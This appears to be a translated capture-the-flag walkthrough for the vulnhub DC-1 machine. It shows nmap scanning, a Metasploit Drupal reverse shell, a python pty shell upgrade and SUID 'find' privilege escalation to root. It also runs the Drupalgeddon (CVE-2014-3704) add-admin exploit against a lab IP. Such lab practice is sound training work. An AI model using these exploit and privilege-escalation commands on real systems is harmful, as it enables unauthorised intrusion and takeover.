download link
Link: https://pan.baidu.com/s/1W3bEDx219EEsnGFUnDX3-Q
Extraction code: pm7e
Use vnware to import the ova file, pay attention to make both kali and the target machine in nat network mode
Start, the display page cannot perform any operations
Prepare
First check kali's ip
nmap scan to find the target machine ip
View Range Open Ports
Browser access ip, see Drupal
test
Use msf to see if there is an exploit script, enter msfconsole to start
Find something related to drupal, try to choose the one with a better new date, use the serial number 1, and bounce the shell
Check out the options that need to be set
You can see that you only need to set rhosts at present, that is, the shooting range ip, and then exploit
Enter the shell
Then use python fixed statements for interactive access
python -c 'import pty; pty.spawn("/bin/bash")'
Judging permissions, it is a low-privilege account
Escalation of rights
Suid privilege escalation is to set some that can be run by root
fixed statement query
find / -user root -perm -4000 -print 2>/dev/null
Pay attention to the feasibility documents that can be used to raise rights at present, we use find to raise rights
find / -name cron.php -exec "/bin/sh" \;
// 路径含有cron.php文件, \为转义字符
You can see that we have root permissions
Find files related to flag
Check it out, it's done
drupal classic vulnerability
CVE2014-3704, add administrator account, suitable for version 7.0-7.31
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) - PHP webapps Exploit
After downloading, it becomes a py file. In the directory of the downloaded file, the following are some parameter prompts
Run python 34992.py -t http://192.168.80.129 -u 123 -p 123
python 34992.py -t http://192.168.80.129 -u 123 -p 123
Copy the url below and open the browser
Try to log in, and if you successfully log in to the background, you have obtained administrator privileges
Complete steps - find flag5 from flag1
Combining this article and reference: [Basic direction] Super detailed explanation of vulnhub shooting range DC-1_哔哩哔哩_bilibili